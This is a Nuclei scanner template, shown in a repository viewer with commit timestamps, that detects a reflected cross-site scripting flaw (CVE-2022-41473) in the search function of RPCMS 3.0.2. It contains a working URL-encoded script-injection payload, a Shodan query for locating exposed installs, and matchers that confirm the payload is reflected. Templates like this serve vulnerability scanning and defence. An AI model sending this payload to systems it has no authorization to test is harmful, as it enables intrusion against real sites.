nuclei-templates/cves/2022/CVE-2022-41473.yaml

43 lines
1011 B
YAML
Raw Normal View History

2022-10-17 04:51:54 +00:00
id: CVE-2022-41473
info:
name: RPCMS 3.0.2 - Cross-site scripting (XSS)
author: arafatansari
severity: medium
description: |
RPCMS v3.0.2 was discovered to contain a reflected cross-site scripting (XSS) vulnerability in the Search function.
reference:
- https://github.com/ralap-z/rpcms/issues/1
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-41473
cwe-id: CWE-79
2022-10-17 04:51:54 +00:00
metadata:
shodan-query: http.html:"RPCMS"
verified: "true"
2022-10-17 07:28:48 +00:00
tags: cve,cve2022,rpcms,xss
2022-10-17 04:51:54 +00:00
requests:
2022-10-17 05:37:45 +00:00
- method: GET
path:
- "{{BaseURL}}/search/?q=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
2022-10-17 04:51:54 +00:00
matchers-condition: and
matchers:
2022-10-17 05:37:45 +00:00
- type: word
part: body
words:
- '<script>alert(document.domain)</script>'
- 'rpcms'
condition: and
- type: word
part: header
words:
- "text/html"
2022-10-17 04:51:54 +00:00
- type: status
status:
- 200